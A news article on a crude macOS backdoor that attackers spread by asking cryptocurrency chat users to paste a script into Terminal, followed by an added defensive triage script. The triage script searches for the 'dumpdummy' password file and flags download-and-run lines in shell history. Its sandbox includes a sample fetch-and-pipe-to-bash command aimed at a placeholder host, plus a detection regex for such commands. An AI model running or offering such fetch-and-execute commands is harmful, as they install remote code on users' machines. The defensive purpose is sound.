Security researchers have revealed that a piece of malware is targeting macOS users who discuss cryptocurrencies on Slack and Discord.
“Dumb” macOS Attack
The malware was first reported by Remco Verhoef of SANS. He explained that the attackers impersonate “key people” in cryptocurrency-related chats and then share malicious scripts.
The attackers would try to persuade users to paste the script into the Terminal window of their Macs. The script sends a command that downloads a 34 MB file and executes it; this, in turn, establishes a remote connection that acts as a backdoor for the attackers.
The obvious flaws in the attackers’ plan caught the attention of Patrick Wardle, a Mac malware expert. In a more detailed blog post, he noted that:
- the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it’s trivial to detect at every step (that dumb)
- … and finally, the malware saves the user’s password to dumpdummy
Common Sense is the Only Protection You Need
The binary bundles a set of libraries, including OpenSSL, which encrypts its communications back to the server. Remco Verhoef established that the bash script attempts to connect to a system belonging to CrownCloud, a German hosting provider.
Once the binary is executed, it gives the attacker the ability to run commands as if they were the root user of the infected Mac.
For this to happen, however, the owner of the Mac needs to enter a password so the script can continue. Ironically, the script stores that password in a temporary file named “dumpdummy,” as noted by Wardle.
In other words, all you need to do to prevent this malware from causing any damage is refrain from pasting a script sent to you by someone on Slack or Discord into your Terminal window.
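The article stresses that the infection is "trivial to detect at every step": the lure is a pasted download-and-run command, and the malware leaves the victim's password in a file named "dumpdummy". The following triage script is an added example written for this article, not code from the article, from Remco Verhoef or from Patrick Wardle. It checks a Mac for both traces. Which directories to search and where the shell history lives are assumptions (the article only says "a temporary file"), and the sample sandbox it builds is constructed so the script runs offline.

```shell
#!/bin/sh
# Added example (not from the article): defender-side triage for a Mac whose user
# may have pasted an untrusted script into Terminal.
#   find_dumpdummy DIR...  - report every file named "dumpdummy" under the given
#                            directories (the article names the file; the directories
#                            to search are an assumption).
#   scan_history FILE      - report history lines that fetch a remote file and execute
#                            it in the same command, the shape of a "paste this" lure.
# Each function prints its findings and returns 0 if anything was found, 1 if clean.

# Download-then-execute pattern: curl/wget piped straight into a shell, or
# followed by chmod +x on the fetched file.
DLEXEC_RE='(curl|wget).*(\|[[:space:]]*(ba|z)?sh([[:space:]]|$)|chmod[[:space:]]+\+x)'

find_dumpdummy() {
    hits=0
    for d in "$@"; do
        [ -d "$d" ] || continue
        # Heredoc rather than a pipe so $hits survives the loop in POSIX sh.
        while IFS= read -r f; do
            [ -n "$f" ] || continue
            echo "SUSPICIOUS: password dump file present: $f"
            hits=$((hits + 1))
        done <<EOF
$(find "$d" -type f -name dumpdummy 2>/dev/null)
EOF
    done
    [ "$hits" -gt 0 ]
}

scan_history() {
    [ -f "$1" ] || return 1
    grep -nE "$DLEXEC_RE" "$1" | sed 's/^/SUSPICIOUS: history line /'
    # The pipeline above reports sed's status; recheck quietly for the verdict.
    grep -qE "$DLEXEC_RE" "$1"
}

# Constructed sandbox so the example runs offline: a fake temp directory holding a
# dumpdummy file and a fake shell history with one pasted download-and-run line.
# The host name is a placeholder and the password value is made up.
demo_triage() {
    sb=$(mktemp -d)
    mkdir -p "$sb/tmp"
    printf 'not-a-real-password\n' > "$sb/tmp/dumpdummy"
    cat > "$sb/zsh_history" <<'EOF'
ls -la
cd ~/Desktop
curl -s http://example.invalid/payload.sh | bash
EOF
    find_dumpdummy "$sb/tmp"
    scan_history "$sb/zsh_history"
    rm -rf "$sb"
}

demo_triage
```

On a real machine you would call `find_dumpdummy /tmp /var/tmp "$HOME"` and `scan_history "$HOME/.zsh_history"` (or `.bash_history`) instead of the sandbox; a hit from either check is a reason to treat the entered password as compromised and rotate it.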
What do you think of this malware targeting MacOS users? Don’t hesitate to let us know in the comments below.